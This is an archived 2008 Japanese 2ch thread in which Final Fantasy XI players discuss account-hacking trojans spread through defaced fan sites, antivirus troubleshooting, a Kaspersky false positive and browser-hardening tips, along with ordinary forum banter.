
909 名前:既にその名前は使われています:2008/08/28(木) 16:44:05 ID:iaML+j9m
知り合いがカスペ導入してみたんだが

タスクを開始しました 2008/08/28 16:03:30
更新元は選択されています http://dnl-jp1.kaspersky-labs.com/ 2008/08/28 16:03:33
配布元ファイルへの接続ができませんでした http://dnl-jp1.kaspersky-labs.com/ 2008/08/28 16:03:33
更新元は選択されています http://dnl-jp3.kaspersky-labs.com/ 2008/08/28 16:03:33
配布元ファイルへの接続ができませんでした http://dnl-jp3.kaspersky-labs.com/ 2008/08/28 16:03:33
更新元は選択されています http://dnl-jp4.kaspersky-labs.com/ 2008/08/28 16:03:33

って出て更新されないみたいなんだけど、解決方法わかる方いますか?

910 名前:既にその名前は使われています:2008/08/28(木) 16:57:55 ID:3hHjsrOH
本人がカスペルスキーのサポセンに聞くのが確実

911 名前:既にその名前は使われています:2008/08/28(木) 17:18:07 ID:Vyy4Jxdy
それかせめてその本人にスレで質問させろw

912 名前:既にその名前は使われています:2008/08/28(木) 17:21:07 ID:6OQI5KdU
自分だと恥ずかしいから人にするんじゃねーのw

913 名前:既にその名前は使われています:2008/08/28(木) 17:22:02 ID:TwsqKDlf
わかんないのは恥ずかしいことじゃないよ 調べもせずクレクレするのが恥ずかしいんだよ

914 名前:既にその名前は使われています:2008/08/28(木) 17:29:21 ID:8iXVuUqV
>>909
(1)PG2を入れていてPG2が接続拒否している。
(2)カスペルスキーのファイアウォール設定を極端にガチガチにしてカスペルスキー自身が自分を弾いている。
(3)クラックされたものを使っていて認証で弾かれている。
(4)サンドボックス内にカスペルスキーをインストールしていてサンドボックスでアクセス制限がかかっている。


俺が考え付くのはこれぐらい。
ちなみにうちの環境だと・・・・kaspersky.comにつながる。 kaspersky-lab.comじゃなくて。

解決になるかどうかしらんけど、更新処理設定で「製品を使用する国の選択」を「日本」にすると変わるかも。

915 名前:既にその名前は使われています:2008/08/28(木) 17:30:32 ID:8iXVuUqV
あ、後これもありうるな

(5)既にOSが感染していて正常に動作しない。

916 名前:既にその名前は使われています:2008/08/28(木) 18:37:56 ID:oiWQ1skK
229agu

917 名前:既にその名前は使われています:2008/08/28(木) 18:38:19 ID:8N7bK+Zm
今日もヴァナの隅っこで
kuzuha■s41■xrea■com/ff/
8月22日1:56〜8月27日20:45頃まで、当サイトの外部jsファイル
(サムネイル画像から別窓で画像を表示するもの)が改竄され、
アカハク目的のトロイをダウンロードさせるリダイレクトコードが挿入されていました。
上記期間にアクセスされた方は、即ウィルスチェックをお願いいたします!

ん〜具体的にどういうコードが埋めまれていたのやら…。

918 名前:既にその名前は使われています:2008/08/28(木) 18:42:09 ID:IfuGUGPx
もうxrea業務停止にしろよ
無料という名のウィルス撒き散らし会社じゃないか

919 名前:既にその名前は使われています:2008/08/28(木) 18:42:12 ID:N6Aexwm0
垢ハックにあってる人ってキャラやギル買ったりしてるからじゃね?
個人情報教えちゃったとか

920 名前:既にその名前は使われています:2008/08/28(木) 18:43:34 ID:IfuGUGPx
>>919
キミにはこのスレはまだ早すぎたようだ…
さあ、夏休みの宿題を終わらせるんだ

921 名前:既にその名前は使われています:2008/08/28(木) 18:45:46 ID:06zF1OLe
>>219
と■eから個人情報が漏れてるって書き込み絶対に1スレに1回はあるよなw

922 名前:既にその名前は使われています:2008/08/28(木) 18:46:36 ID:8uOswtOy
>>919
初々しすぎて涙が出そうになるなw

923 名前:既にその名前は使われています:2008/08/28(木) 18:47:55 ID:JoT4AyG5
ことあるごとになつやすみ。
いやーべんりなことばですな

924 名前:既にその名前は使われています:2008/08/28(木) 18:50:01 ID:f8IcqDKr
まぁ、実際>>919みたいなのがたくさんいるから業者もウマくて
しょーがないんだろうな。

925 名前:既にその名前は使われています:2008/08/28(木) 18:51:15 ID:0tc9zilD
俺がRMT買いしてた時は売る側から個人情報教えろなんて事はなかったが
今は聞かれるんか?


926 名前:既にその名前は使われています:2008/08/28(木) 18:55:10 ID:3nA2qPD2
>>925
消えろカス

927 名前:既にその名前は使われています:2008/08/28(木) 18:55:58 ID:OA1tjtr5
前のときも思ったがなんでxreaはすぐに対策なり公式発表なりをしないんだ

928 名前:既にその名前は使われています:2008/08/28(木) 19:07:58 ID:mtY+5MvK
>>925
死ねよカス

929 名前:既にその名前は使われています:2008/08/28(木) 19:18:02 ID:6OQI5KdU
カスに失礼だろ

930 名前:既にその名前は使われています:2008/08/28(木) 19:24:58 ID:OqQj3sQx
>>927
契約時の規約読んで味噌。

931 名前:既にその名前は使われています:2008/08/28(木) 19:37:16 ID:jei/llY1
先にtw-msnを取得している福建中華は先日一文字弄りドメインを取得。

WHOISは言うまでもなく福建龍岩の新羅
Domain name: tw-nsn■com

fu jian long yan shi xin luo qu jiang shan
long yan shi FJ 364000
cn
Created: 2008-08-23

直接記述ではなく、罠入りブログのIFRAMEとかIMGタグに仕込んでくるかもよ。
気をつけてくれよな!

932 名前:既にその名前は使われています:2008/08/28(木) 19:43:14 ID:8N7bK+Zm
>>917 の件、XREAフォーラムとレン鯖板見たら
いつものfccja(1039045744:88)だったみたい。

933 名前:既にその名前は使われています:2008/08/28(木) 19:47:21 ID:8N7bK+Zm
ちなみにそのXREAトロイ最新版、13世代目
(ファイル名は14となっているけど、13は疑似餌だった)。
ttp://www.virustotal.com/analisis/b9db352e8108f3fdca5c8cad714857bc
検体送付済み。

934 名前:既にその名前は使われています:2008/08/28(木) 19:58:48 ID:FM7L09xo
なんでもいいけど、とりあえずここ見てる人はFirefoxにNoScript入れて
NoScriptの設定でIFRAME不許可にして、危なそうなところはそれで
回ったほうがいいですよ

いまのところ(←ここ大事)その設定でウィルスのおおもとに突っ込んでも
感染はしなかったですから

935 名前:既にその名前は使われています:2008/08/28(木) 20:00:36 ID:7IabkK6A
>>850
ラブレス家のぼっちゃん最初に出てきたときそんなセリフがあったね

936 名前:既にその名前は使われています:2008/08/28(木) 20:23:15 ID:qRUx87Z4
あげ

937 名前:既にその名前は使われています:2008/08/28(木) 20:23:34 ID:iaML+j9m
>>910-915
寝てる間にレスがっ!

本人も色々と調べたりしてるみたいなんだけどイマイチわからないようなのですよ
ここならカスペの名前もよく見かけるし、使ってる人多いならわかるかなーと思いましてね

938 名前:既にその名前は使われています:2008/08/28(木) 20:27:30 ID:FM7L09xo
>>937
その人に伝えてください
名前だけでソフトを選ばないように

939 名前:既にその名前は使われています:2008/08/28(木) 20:43:47 ID:iaML+j9m
>>938
身近に無料ソフトだけで余裕ぶっこいてて、見事に垢ハック食らった実例もあるし
こちらとしては良い傾向だとは思ってるんだけどね

ちなみにその実例はモチロン俺ですよ!

940 名前:既にその名前は使われています:2008/08/28(木) 20:46:23 ID:h6d8XDqx
初心者のPCはスタートメニューとタスクマネージャを見せてもらわないと回答できん
ウイルス対策ソフトが通常の三倍とかファイアウォールが通常の三倍とかよくあるし
>>939
無料ソフトを使ってて数年間一度も感染したことありませんが何か?
駄目な奴って自分の無能さを省みず他人が何とかしてくれると思ってんだよな

941 名前:既にその名前は使われています:2008/08/28(木) 20:49:21 ID:FM7L09xo
わたしはノートンをここ10年使ってますけど、それで感染した経験は皆無です

942 名前:既にその名前は使われています:2008/08/28(木) 20:51:09 ID:CalROdv6
>>939
無料ウイルススキャンソフト自体が悪い訳じゃない
既存アカハックなら無料だけでも防衛できるしな
「余裕ぶっこいて」が一番問題なのは自覚してるみたいだが

943 名前:既にその名前は使われています:2008/08/28(木) 20:56:05 ID:yLvi59xS
>>939
無料ソフトでも仮想マシンでブラウジングすりゃ平気だ。
PG2とかもあるんだし…

まぁ、それでも注意はしているが。

944 名前:既にその名前は使われています:2008/08/28(木) 21:00:58 ID:CalROdv6
>>943
仮想化は現状ベストな選択だけど
慌ててここ見るヤツにはハードルが高すぎる
質問された時の対応が面倒だから誰もお勧めしてない

945 名前:既にその名前は使われています:2008/08/28(木) 21:04:59 ID:FM7L09xo
基本的には自分の疑問を自分で解決できなければアウトです
ウェブを見てわからなければ、次に手助けを求めるのはカスタマーサポート
とくに誤検出が多いカスペルスキーの場合は、メーカーのサポートを
気軽に(というと御幣があるかもしれませんが)利用できるくらいの
根性なり気合がないと使いこなすのは難しいと思いますね

946 名前:945:2008/08/28(木) 21:06:56 ID:FM7L09xo
焦るな>わたし

御幣× 語弊○

947 名前:既にその名前は使われています:2008/08/28(木) 21:10:11 ID:PU4McM93
ウィルスセキュリティーゼロでは、感染時には検出しなかっが、手動スキャンで見つかった。。

948 名前:既にその名前は使われています:2008/08/28(木) 21:13:13 ID:yLvi59xS
>>944
ハードルが高いのかどうかは自分じゃさっぱりわからんが、
こういうのって興味がないとなかなか手を出さないし、人にお勧めはできないよなぁ。

もっと手軽なブラウザ仮想化等の技術向上が望まれるところだ。

949 名前:既にその名前は使われています:2008/08/28(木) 21:13:40 ID:FM7L09xo
これを入れておけばウィルスには感染しないというウィルス駆除系ソフトは
ありませんから、まぁなに入れてても同じだとは思います
駆除系ソフトで迷うより先に、いちばんのセキュリティリスクである
ブラウザの設定なりソフトの選択を先にするべきですね

950 名前:既にその名前は使われています:2008/08/28(木) 21:14:46 ID:80eMKf6H
ふぅ

951 名前:既にその名前は使われています:2008/08/28(木) 21:16:15 ID:cNQxaq6/
ところでパスワードにフリーチベットやら天安門事件
やらのキーワードを混ぜるのはどれくらい有効?

952 名前:既にその名前は使われています:2008/08/28(木) 21:24:24 ID:FM7L09xo
>>951
天安門事件は英訳するとかなり長いですね↓
Tiananmen Square prodemocracy protests

パス設定には不向きかもしれません

953 名前:既にその名前は使われています:2008/08/28(木) 21:31:01 ID:h6d8XDqx
>>948
VistaのIE7でユーザー辞書が共有できなくて問題になったぐらいだから
利便性を維持しつつブラウザ環境を安全に隔離するのは難しい課題だな

954 名前:既にその名前は使われています:2008/08/28(木) 21:41:05 ID:cNQxaq6/
>>952
パスワードは長いにこしたことはなくね?

955 名前:既にその名前は使われています:2008/08/28(木) 21:50:27 ID:CalROdv6
>>954
業者はパス見てハック対象決めてる訳じゃないだろ
長くして頻繁に変更するのは基本中の基本だ

それから、下げるな

956 名前:既にその名前は使われています:2008/08/28(木) 21:52:01 ID:7u6g8r2K
長くて面倒だな・・・保存しとくか

957 名前:既にその名前は使われています:2008/08/28(木) 21:52:16 ID:OA1tjtr5
あっ

958 名前:既にその名前は使われています:2008/08/28(木) 21:56:21 ID:yLvi59xS
>>953
そんな問題が出てたのか。

ブラウザ環境を仮想化するソフト、いくつか出てるけどブックマーク保存できなかったりで、
面倒っぽいから一般のユーザーはわざわざ手間を増やしてまでセキュリティを
意識しないだろうねぇ。

まぁ、今更山田ウィルスに感染してた奴も居たくらいだしな。

もっと根本的な対処方法が欲しいところだ。

959 名前:既にその名前は使われています:2008/08/28(木) 22:09:04 ID:FM7L09xo
なにもわからないままにブラウザを使っているのは問題外だと思うですけど
快適さを選ぶか安全を選ぶかはブラウザを使っている人の判断ですから
それを認識した上で感染してしまうのは仕方がないとは思いますけどね

960 名前:既にその名前は使われています:2008/08/28(木) 22:09:45 ID:3UN3AlIk
「〜〜してれば感染しなかった」って人は本当に感染したことないのかねw

今時のウィルスは仕事が終わったらさっさと痕跡を消してしまうから後でスキャンしても見つからないよ。

961 名前:既にその名前は使われています:2008/08/28(木) 22:12:13 ID:M5ZJTtuQ
>>954
あんま意味ないだろ
辞書から総アタックかけるわけじゃあるまいし

962 名前:既にその名前は使われています:2008/08/28(木) 22:38:05 ID:7Qo8w15g
>>958
VistaでUAC有効の状態だと、IEの保護モードではIL(整合性レベル)=Lowの権限しか持てないので、IL=Mediumが
必要な通常のIMEユーザー辞書を扱えず、LocalLowフォルダに用意された専用のユーザー辞書を使うことになる。

仮想環境だけでなく、今後BIOSがEFIに置き換えられるようになれば、それこそマザーボードにプリインストールされた
ブラウザなんて物も出てきそうだけど。
ただ、ブックマークやら日本語入力やらの環境をオンラインで管理できるようにならないと、利便性は今ひとつかもね。

963 名前:既にその名前は使われています:2008/08/28(木) 23:19:16 ID:nAk0izmv
定期巡回であります!

964 名前:既にその名前は使われています:2008/08/28(木) 23:19:29 ID:iW9syQPL


965 名前:既にその名前は使われています:2008/08/28(木) 23:37:23 ID:sQCfBAFR
あげあげ


966 名前:既にその名前は使われています:2008/08/29(金) 00:04:33 ID:PKlnqAuD
今年は暦上では7日で夏は終わってんだけどなage

夏前には、って夏に入る前だと解釈してたが違うのかhage

967 名前:既にその名前は使われています:2008/08/29(金) 00:17:07 ID:I8t3pRUG
おやすみ前のあげ。

968 名前:既にその名前は使われています:2008/08/29(金) 00:20:36 ID:83uxTbFN
  \         /_ /     ヽ /   } レ,'        / ̄ ̄ ̄ ̄\
  |`l`ヽ    /ヽ/ <´`ヽ u  ∨ u  i レ'          /
  └l> ̄    !i´-)     |\ `、 ヽ), />/        /  夏  ほ  こ
   !´ヽ、   ヽ ( _ U   !、 ヽ。ヽ/,レ,。7´/-┬―┬―┬./  だ  ん  れ
  _|_/;:;:;7ヽ-ヽ、 '')  ""'''`` ‐'"='-'" /    !   !   /    :.  と  か
   |  |;:;:;:{  U u ̄|| u u  ,..、_ -> /`i   !   !  \   :.  う  ら
   |  |;:;:;:;i\    iヽ、   i {++-`7, /|  i   !   !  <_      の  が
  __i ヽ;:;:;ヽ `、  i   ヽ、  ̄ ̄/ =、_i_  !   !   /
   ヽ ヽ;:;:;:\ `ヽ、i   /,ゝ_/|  i   ̄ヽヽ !  ! ,, -'\
    ヽ、\;:;:;:;:`ー、`ー'´ ̄/;:;ノ  ノ      ヽ| / ,、-''´ \/ ̄ ̄ ̄ ̄
                スクエニ           Y´/;:;:;\

969 名前:既にその名前は使われています:2008/08/29(金) 00:29:16 ID:2Hl7Wq/0
ねーよwwww

970 名前:既にその名前は使われています:2008/08/29(金) 01:02:42 ID:GBlgRKsC
215から上げ

971 名前:既にその名前は使われています:2008/08/29(金) 01:03:03 ID:2Hl7Wq/0
sageてたあげ

972 名前:既にその名前は使われています:2008/08/29(金) 01:36:02 ID:GrIxpdT7
PC動作が重くなって青くなってたら
ウィルススキャンは真っ白でタダ単に5年酷使したPCがお亡くなりになりかけだっただけだった。

ウィルスバスター2008や火狐Noscriptははスペックおいついてないとやたら起動が遅くなったり
カスペのスキャンでものすごい時間かかったりするんで
パニクって質問するより前に一度寝てる間にでもスキャンかけとくといいと思う。

新PC組んでパス変えて一息つけたけどまったくもってやれやれだぜ

973 名前:既にその名前は使われています:2008/08/29(金) 02:50:23 ID:GBlgRKsC
ほし・・・のせんいち

974 名前:既にその名前は使われています:2008/08/29(金) 03:50:43 ID:HP0cGBHw
ageとくヴァーン

ついでに、、。8/10前後にFF11MAPサイト改竄されてた時にかぎって
丁度踏みまくってたんだが、ようやくOS入れ直しました。
今年に入って3回目のクリーンインスコ。今年最後だとイイナ



975 名前:既にその名前は使われています:2008/08/29(金) 03:51:03 ID:/R8GiUYi
そろそろ新スレだね保守
業者撲滅の夏はいつはじまるのかな

976 名前:既にその名前は使われています:2008/08/29(金) 04:06:54 ID:GBlgRKsC
次スレ立てちゃってきます

977 名前:既にその名前は使われています:2008/08/29(金) 04:12:50 ID:GBlgRKsC
次スレ

●● RMT業者の垢ハックが多発している件38 ●●
http://changi.2ch.net/test/read.cgi/ogame/1219950507/

978 名前:既にその名前は使われています:2008/08/29(金) 04:16:01 ID:GBlgRKsC
しかしこの時間に立てると保守がたいへん・・・

979 名前:既にその名前は使われています:2008/08/29(金) 05:01:34 ID:GBlgRKsC
とりあえずあげ

980 名前:既にその名前は使われています:2008/08/29(金) 08:06:38 ID:sxHrU46O
ume

981 名前:既にその名前は使われています:2008/08/29(金) 09:35:59 ID:9s1IkWJc


982 名前:既にその名前は使われています:2008/08/29(金) 09:56:20 ID:+ZrNi9Y7
はがき送って三週間で完了通知。解約したから早かったのか・・・
あげ

983 名前:既にその名前は使われています:2008/08/29(金) 10:42:15 ID:lXlxxX22
トロイの木馬 Trojan.Win32.DNSChanger.ien
ファイル: C:\WINDOWS\system32\drivers\ASUSHWIO.SYS

さっき、カスペルスキーで検索したらこんなの出てきた。駆除できなかったので削除→PS2版でインしてパス変更
ググッてもわからんし、これ何だろう・・・


984 名前:既にその名前は使われています:2008/08/29(金) 10:56:14 ID:yHk4i/rQ
>>983
ASUS製品のドライバみたいですな。
カスペルスキーのフォーラムで、

ユーザー「誤検出?」
中の人「かもかも。メールで送ってちょ」

というやり取りがなされてます。
ttp://forum.kaspersky.com/index.php?s=812d017dee1b3c9c19af20eddd853a4a&showtopic=82629

985 名前:既にその名前は使われています:2008/08/29(金) 10:58:25 ID:yHk4i/rQ
あ「メールで」は脳内削除で。

986 名前:既にその名前は使われています:2008/08/29(金) 11:13:44 ID:lXlxxX22
>>984
最新版データベース(7時38分版)にして
削除したものを復元して完全スキャンしたら検出しなかった
誤検出で確定っぽいね
d

987 名前:既にその名前は使われています:2008/08/29(金) 13:50:49 ID:ltE5fpNl
質問なんだけどFFAHを安全に見る方法ってある?
ここで1回感染したんだが見れないとなるとそれはそれで不便でww

988 名前:既にその名前は使われています:2008/08/29(金) 13:59:16 ID:83uxTbFN
Lynxで見る

989 名前:既にその名前は使われています:2008/08/29(金) 14:02:13 ID:ioVuPfRF
>>987
C:\WINDOWS\system32\drivers\etc\hosts
このファイルに、

0.0.0.0 ads.ffxiah.com

と書きこんで保存・・・で、FFXIAHの広告を読みこまなくなる
罠がメインページに挿入されたらどうしようもないが。

990 名前:既にその名前は使われています:2008/08/29(金) 14:24:27 ID:ltE5fpNl
>>989
広告読み込まなくなりました
さんくす


991 名前:既にその名前は使われています:2008/08/29(金) 15:34:29 ID:NMcblVMm
埋め

992 名前:既にその名前は使われています:2008/08/29(金) 15:55:26 ID:83uxTbFN
放っとけば勝手に落ちるな、このスレ保持数だと

993 名前:既にその名前は使われています:2008/08/29(金) 16:20:57 ID:duO4D7GM
ほっといて落とした方が、鯖の負荷少ないんだっけ?

994 名前:既にその名前は使われています:2008/08/29(金) 16:44:26 ID:YX2JSrfe
あましておくのはもったいないので埋めます

995 名前:既にその名前は使われています:2008/08/29(金) 16:56:09 ID:bE3PW8tw
梅梅

996 名前:既にその名前は使われています:2008/08/29(金) 16:56:43 ID:UXdLfOna
埋め

997 名前:既にその名前は使われています:2008/08/29(金) 17:02:22 ID:83uxTbFN


998 名前:既にその名前は使われています:2008/08/29(金) 17:03:25 ID:83uxTbFN


999 名前:既にその名前は使われています:2008/08/29(金) 17:05:12 ID:83uxTbFN


1000 名前:既にその名前は使われています:2008/08/29(金) 17:05:46 ID:Il22Y7RD


1001 名前:1001:Over 1000 Thread
  === Area: Live Networkgames@2ch http://changi.2ch.net/ogame/ ===

      //
    / .人      あ、ぽこたんインできないお!
    /  (__) パカ
   / ∩(____)       このスレッドは1000を超えたお。。。
   / .|( ・∀・)_       もう書けないので、新しいスレッドにインするお!
  // |   ヽ/
  " ̄ ̄ ̄"∪



全部 最新50
DAT2HTML 0.35b Converted.